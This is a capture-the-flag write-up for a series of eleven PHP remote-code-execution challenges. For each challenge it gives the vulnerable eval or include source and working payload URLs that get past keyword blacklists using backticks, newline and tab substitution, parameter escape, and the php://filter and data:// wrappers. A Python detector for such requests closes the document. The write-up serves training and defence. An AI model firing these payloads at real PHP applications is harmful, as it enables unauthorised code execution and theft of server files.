CTF-Show RCE Series
Problem 1
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
// filter the keyword "flag"
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
Bypass via the system() function
The filter only rejects the literal string flag (case-insensitively), so a shell glob such as fl*.php never matches the regex yet still expands to flag.php.
Visit directly: http://d3d5e86e-ce2d-4fa2-8c28-48a63fa55df0.challenge.ctf.show/?c=system(%22tac%20fl*.php%22);
This returns the flag.
Problem 2
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
// filter the keywords flag, system and php
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
Bypass via backticks
system is filtered, but the backtick operator runs a shell command just like shell_exec(), and echo prints its output.
Visit directly:
http://d92f60d2-3ceb-4102-a4c4-6488acae34da.challenge.ctf.show/?c=echo%20`tac%20fla*`;
This returns the flag.
Problem 3
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
// filter flag, system, php, cat, sort, shell, ".", the space and the single quote
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
Bypass via backticks (the space is filtered, so a newline replaces it)
%0A => line feed (newline)
%09 => tab
Note: inside the backticks (quotes) only %09 works as the separator.
Visit directly:
http://c39ab4b2-d129-4164-9dca-ae13ca1554d1.challenge.ctf.show/?c=echo%0A`tac%09fla*`;
This returns the flag.
Problem 4
Background
The php://filter pseudo-protocol (stream wrapper) is used to read files.
When allow_url_include=on and a file inclusion vulnerability exists, php://filter can be used to display a file's contents directly.
Example:
http://xxx.xxx.xxx/index.php?filename=php://filter/read=convert.base64-encode/resource=xxx.php
- php://filter is a protocol for accessing (reading) local files
- read=convert.base64-encode means the contents are returned base64-encoded
- resource=xxx.php names the file to read
Reference for the above: https://blog.csdn.net/m0_56107268/article/details/127760614
Approach
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
// on top of the previous problem, also filter the backtick, the keyword echo, the semicolon and parentheses
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
File inclusion bypass (php pseudo-protocol plus parameter escape). With ( and ; filtered, include is used as a language construct without parentheses, the php://filter string is moved into a second parameter 1 that the regex never inspects, and ?> terminates the statement. Three variants:
- no space
- bypass with %0a
- use double quotes
Visit directly:
No space: http://49c47d3f-3c71-4ec7-b2f5-51c855db29ea.challenge.ctf.show/?c=include$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=flag.php
%0a bypass: http://49c47d3f-3c71-4ec7-b2f5-51c855db29ea.challenge.ctf.show/?c=include%0a$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=flag.php
Double quotes: http://49c47d3f-3c71-4ec7-b2f5-51c855db29ea.challenge.ctf.show/?c=include%22$_GET[1]%22?%3E&1=php://filter/read=convert.base64-encode/resource=flag.php
Note: in PHP, ?> can stand in for the semicolon of the final statement.
This returns a base64 string:
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7YTAzM2RiMDQtZTA1ZS00OWEzLWE3ZTctMGMyNTY5MDg2NWNkfSI7DQo=
Decoding it yields the flag:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$flag="ctfshow{a033db04-e05e-49a3-a7e7-0c25690865cd}";
Problem 5
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 02:22:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
// on top of the previous problem, also filter the double quote
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
Again use file inclusion + php pseudo-protocol with the %0a or no-space variant (the double quote is now filtered, so that variant no longer works).
Visit directly:
%0a bypass: http://f324d434-426c-4db5-82e5-db0a511926e9.challenge.ctf.show/?c=include%0a$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=flag.php
No space: http://f324d434-426c-4db5-82e5-db0a511926e9.challenge.ctf.show/?c=include$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=flag.php
This returns a base64 string:
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7ZjVjMTYyMTItM2Y3MS00YjdkLWFjYmQtMDc4M2MxMzQ5OWM2fSI7DQo
Decoding it yields the flag:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$flag="ctfshow{f5c16212-3f71-4b7d-acbd-0783c13499c6}";
Problem 6
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
// on top of the previous problem, also filter the colon
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
Again use file inclusion + php pseudo-protocol with the %0a or no-space variant. The colon is now filtered, but it only occurs in parameter 1, which the regex never inspects.
Visit directly:
%0a bypass: http://4f04f045-4d96-4b9b-8a5b-8ce68da98a1f.challenge.ctf.show/?c=include%0a$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=flag.php
No space: http://4f04f045-4d96-4b9b-8a5b-8ce68da98a1f.challenge.ctf.show/?c=include$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=flag.php
This returns a base64 string:
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7MDgyYzU4NjktMTdiZi00YzkyLThiYzYtNjQ4NDkzZjhhODczfSI7DQo
Decoding it yields the flag:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$flag="ctfshow{082c5869-17bf-4c92-8bc6-648493f8a873}";
Problem 7
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
// on top of the previous problem, also filter < and =
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
Again use file inclusion + php pseudo-protocol with the %0a or no-space variant; the newly filtered < and = again appear only in parameter 1.
Visit directly:
%0a bypass: http://1e59005c-4eff-4c1c-b7df-7a79857e86be.challenge.ctf.show/?c=include%0a$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=flag.php
No space: http://1e59005c-4eff-4c1c-b7df-7a79857e86be.challenge.ctf.show/?c=include$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=flag.php
This returns a base64 string:
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDM6Mzc6MTENCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7ZWQxNDY2ZmQtOTZlOC00NmVjLThkMTMtMmI2M2E3N2Y0ZTY5fSI7
Decoding it yields the flag:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 03:37:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$flag="ctfshow{ed1466fd-96e8-46ec-8d13-2b63a77f4e69}";
Problem 8
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:16
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
// on top of the previous problem, also filter / and the digits 0-9
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
Again use file inclusion + php pseudo-protocol with the %0a or no-space variant. Digits are now filtered, so the second parameter is named a instead of 1.
Visit directly:
%0a bypass: http://6f652007-ae21-43ae-b2ca-49a8794c436e.challenge.ctf.show/?c=include%0a$_GET[a]?%3E&a=php://filter/read=convert.base64-encode/resource=flag.php
No space: http://6f652007-ae21-43ae-b2ca-49a8794c436e.challenge.ctf.show/?c=include$_GET[a]?%3E&a=php://filter/read=convert.base64-encode/resource=flag.php
This returns a base64 string:
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDM6Mzc6MTENCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7ZmU1ZmJiYzctODFlYi00NzI5LWIzZDEtMWU5NjQ2NGUyOWIyfSI7
Decoding it yields the flag:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 03:37:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$flag="ctfshow{fe5fbbc7-81eb-4729-b3d1-1e96464e29b2}";
Problem 9
Background
The data pseudo-protocol in PHP:
A data-stream wrapper that carries data in the stated format. It lets the user control the input stream, and when it is combined with an include function the user-supplied data:// stream is executed as PHP code.
1. data://text/plain,
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
2. data://text/plain;base64,
http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
Reference for the above:
https://blog.csdn.net/cosmoslin/article/details/120695429
Approach
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
Use the data pseudo-protocol to bypass the filter: the included stream is the PHP code itself, and since only flag is filtered the command uses the glob fla*.
data pseudo-protocol:
http://b83f8aad-8985-4977-bbc5-5c656a9f946f.challenge.ctf.show/?c=data://text/plain,%3C?php%20echo%20system(%22tac%20fla*%22)?%3E
Problem 10
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
// on top of the previous problem, also block the keywords php and file
if(!preg_match("/flag|php|file/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
Bypass with data pseudo-protocol + base64 encoding, or with the short echo tag. Because php is filtered, the <?php opening tag cannot appear literally: either base64-encode the whole payload so the wrapper decodes it, or open with the short tag <?= instead.
Note: the short tag <?= is itself an echo, so echo must not be written again inside it or the payload fails.
Visit directly:
data pseudo-protocol + short tag: http://f35d4539-0ccf-4028-b0fc-db14222846b8.challenge.ctf.show/?c=data://text/plain,%3C?=system(%22tac%20fla*%22);?%3E
data pseudo-protocol + base64: https://f35d4539-0ccf-4028-b0fc-db14222846b8.challenge.ctf.show/?c=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oInRhYyBmbGEqIik7Pz4=
This returns the flag.
Problem 11
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
// filter the keyword "flag"
if(!preg_match("/flag/i", $c)){
// the included file's extension is fixed
include($c.".php");
}
}else{
highlight_file(__FILE__);
}
Bypass with data pseudo-protocol + a comment
Visit directly:
http://f1af80cf-4905-4f8f-b97e-5378f99f0382.challenge.ctf.show/?c=data://text/plain,%3C?php%20echo%20system(%22tac%20fla*%22)?%3E//
Note: // starts a comment, so the appended .php suffix is commented out and the data:// stream is included as-is.
Summary
Common RCE bypass techniques
- system() function bypass
- backtick bypass
- %0a (newline) / %09 (tab) bypass
- file inclusion bypass => parameter escape
- pseudo-protocol bypass
  - php://filter
  - data://text/plain
  - data://text/plain;base64
- pseudo-protocol + comment bypass
- short-tag bypass
- log-file bypass
- ...
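The blacklist filters from Problems 1 to 8 and the php:// and data:// wrappers from Problems 4 and 9 to 11, replayed from the defender's side as an added example that is not part of the original write-up: the regexes are copied from the challenge sources, while FILTERS, INDICATORS, analyse(), expand_data_uri() and the access-log lines are constructed here to show what a request-level detector should match on once the parameter values are URL-decoded and a base64 data: body is expanded.

```python
import base64
import re
from urllib.parse import unquote

# Blacklists copied from the challenge sources above (PCRE and Python re agree on them).
FILTERS = {
    "p1": r"flag",
    "p8": r"flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]",
}

def blacklist_passes(problem, c):
    """True when the raw value of ?c= would reach eval() in that challenge."""
    return re.search(FILTERS[problem], c, re.I) is None

# What a defender matches instead: structural indicators in the URL-decoded parameter values.
INDICATORS = {
    "stream-wrapper": re.compile(r"\b(?:php|data)://", re.I),
    "control-whitespace": re.compile(r"[\n\t]"),                # %0a / %09 standing in for a space
    "nested-param": re.compile(r"\$_(?:GET|POST|REQUEST)\["),  # payload moved into a second parameter
    "close-tag-as-terminator": re.compile(r"\?>"),             # ?> used in place of the filtered ';'
    "exec-sink": re.compile(r"\bsystem\s*\(|`", re.I),
}

def expand_data_uri(text):
    """data:...;base64,<body>: append the decoded body, which is what include() would execute."""
    m = re.search(r"data:(?://)?[^,\s]*;base64,([A-Za-z0-9+/=]+)", text, re.I)
    if m:
        try:
            text += " " + base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: not real base64, keep the raw text only
            pass
    return text

def analyse(request_line, expand=True):
    """Return the sorted indicator names that fire on one access-log request line."""
    query = request_line.split(" ", 2)[1].partition("?")[2]
    text = " ".join(unquote(p.partition("=")[2]) for p in query.split("&") if p)
    if expand:
        text = expand_data_uri(text)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

# Constructed access-log request lines carrying the query strings shown in the write-up.
LOG = [
    "GET /?c=system(%22tac%20fl*.php%22); HTTP/1.1",
    "GET /?c=echo%0A`tac%09fla*`; HTTP/1.1",
    "GET /?c=include$_GET[a]?%3E&a=php://filter/read=convert.base64-encode/resource=flag.php HTTP/1.1",
    "GET /?c=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oInRhYyBmbGEqIik7Pz4= HTTP/1.1",
    "GET /?c=highlight_file HTTP/1.1",  # benign-looking request, for contrast
]
```

Every challenge payload passes its own blacklist, while analyse() flags each of them on the decoded text and stays silent on the benign line; without expand_data_uri() the base64 variant shows only the wrapper, which is why a detector must decode before matching.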